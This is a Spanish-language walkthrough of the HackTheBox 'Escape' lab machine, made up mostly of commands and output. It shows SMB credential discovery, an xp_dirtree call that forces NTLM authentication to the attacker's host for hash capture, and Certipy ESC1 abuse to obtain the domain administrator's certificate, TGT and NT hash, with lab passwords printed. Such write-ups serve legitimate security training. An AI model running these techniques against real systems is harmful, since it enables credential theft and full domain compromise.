HackTheBox Escape

nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.202 -oG port

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
1433/tcp open  ms-sql-s         syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127
5985/tcp open  wsman            syn-ack ttl 127

Puertos abiertos.

---

❯ nmap -sCV -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 10.10.11.202 -oN target-txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 01:55 EDT
Nmap scan report for 10.10.11.202
Host is up (0.039s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-08 06:42:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-08T06:43:29+00:00; +46m42s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-05-08T06:43:28+00:00; +46m41s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.202:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-05-08T06:43:29+00:00; +46m42s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-08T06:40:03
|_Not valid after:  2055-05-08T06:40:03
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-08T06:43:29+00:00; +46m42s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-08T06:43:28+00:00; +46m41s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-08T06:42:49
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 46m40s, deviation: 2s, median: 46m40s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.00 seconds

Versiones y servicios que corren para cada uno de sus puertos.

---

Ldapsearch

❯ ldapsearch -x -H ldap://10.10.11.202 -s Base | grep 'ServiceName'
ldapServiceName: sequel.htb:dc$@SEQUEL.HTB
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN

Verificamos el dominio y lo agregamos al etc/hosts.

---

Smbclient

❯ smbclient -L //10.10.11.202/ -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Public          Disk      
	SYSVOL          Disk      Logon server share 

Observamos los recursos compartidos vamos a explorarlos.

❯ smbclient //10.10.11.202/Public -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

		5184255 blocks of size 4096. 1461245 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (208.6 KiloBytes/sec) (average 208.6 KiloBytes/sec)
smb: \> exit

Nos conectamos al recurso compartido Public y nos descargamos el archivo PDF que hemos encontrado.

---

 xdg-open "SQL Server Procedures.pdf" & disown 1>/dev/null

Observamos el contenido del PDF.

Observamos credenciales, vamos a usarlas conforme el nombre del PDF.

---

Impacket-mssqlclient

❯ impacket-mssqlclient PublicUser:GuestUserCantWrite1@sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)> 

Ya estámos conectados exitosamente al servidor Microsoft SQL Server (sequel.htb) usando impacket-mssqlclient con el usuario PublicUser. El prompt SQL (PublicUser guest@master)> indica que estás autenticado y en el contexto de la base de datos master

SQL (PublicUser  guest@master)> EXEC MASTER.sys.xp_dirtree '\\10.10.14.47\whoami_test';
subdirectory   depth   
------------   -----   
SQL (PublicUser  guest@master)> 

Lo que hacemos fue forzar al SQL Server a realizar una conexión SMB hacia nuestra máquina, el servidor SQL intenta autenticarse automáticamente para acceder al recurso compartido.

Durante este proceso, envía un intento de autenticación utilizando el protocolo NTLM.

Responder, al interceptar esta conexión, captura el intento de autenticación, mostrando el usuario del sistema operativo bajo el cual se está ejecutando el servicio SQL (por ejemplo, sqlsvc, administrator, o SYSTEM). Además, si se negocia la autenticación NTLMv2, Responder nos entrega el hash NTLMv2, lo que nos permite proceder con ataques como el crackeo de contraseñas o el uso del hash en técnicas como Pass-the-Hash o SMB Relay.

---

Responder

responder -I tun0

Y procedemos a crackearlo y obtenemos una contraseña.

---

NXC

❯ nxc winrm  10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie' 2>/dev/null

WINRM       10.10.11.202    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)

Comprobamos que nos podemos conectar por winrm, el usuario seguramnete pertenece al Remote Management Users.

---

Winrm

Observamos un usuarios mas y buenos vamos a observar los logs del usuario actual que tenemos donde encontramos un login failed del usuario Ryan.

2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'.

---

Nos hemos movido lateralmente del usuario sql_svc al usuario Ryan, y bueno tenemos la primera bandera.

---

Privilege Escalation

Certipy-ad

❯ certipy-ad find -u ryan.cooper@authority.htb -p 'NuclearMosquito3' -dc-ip 10.10.11.202 -vulnerable

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[*] Got CA configuration for 'sequel-DC-CA'
[*] Saved BloodHound data to '20250508210818_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250508210818_Certipy.txt'
[*] Saved JSON output to '20250508210818_Certipy.json'

---

Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

Perfecto, el análisis confirma que la plantilla UserAuthentication es vulnerable a ESC1, una de las formas más comunes y explotables de abuso en entornos con ADCS.

La vulnerabilidad ESC1 en ADCS permite que cualquier usuario del dominio solicite un certificado en su propio nombre y lo use para autenticarse como otro usuario con más privilegios. Esto sucede cuando una plantilla de certificados está configurada de forma insegura, permitiendo que el solicitante defina manualmente el Subject Alternative Name (SAN) y que la clave privada sea exportable.

---

❯ sudo ntpdate 10.10.11.202 | certipy-ad req -u ryan.cooper@sequel.htb -p "NuclearMosquito3" -ca sequel-DC-CA -template UserAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.202

[sudo] password for kali: Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

¡Perfecto! 🎯 hemos explotado exitosamente la plantilla vulnerable UserAuthentication (ESC1) y obtenido un certificado válido como administrator@sequel.htb El archivo resultante, administrator.pfx, contiene la clave privada y el certificado necesario para la autenticación.

---

❯ certipy-ad auth -pfx administrator.pfx -username Administrator -domain sequel.htb

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
❯ export KRB5CCNAME=administrator.ccache

Hemos explotado correctamente la plantilla vulnerable UserAuthentication (ESC1) para solicitar un certificado como administrator@sequel.htb, lo que permitió obtener acceso al TGT Kerberos del administrador y su hash NTLM. Gracias a esto, ahora podemos autenticarnos como administrador sin necesidad de conocer su contraseña, utilizando herramientas como secretsdump.py o wmiexec.py con Kerberos (-k -no-pass) para volcar hashes o ejecutar comandos remotos en el controlador de dominio, logrando así el control total del entorno Active Directory.

---

Wmiexec

Nos conectamos usando el TGT que tenemos y maquina resuelta.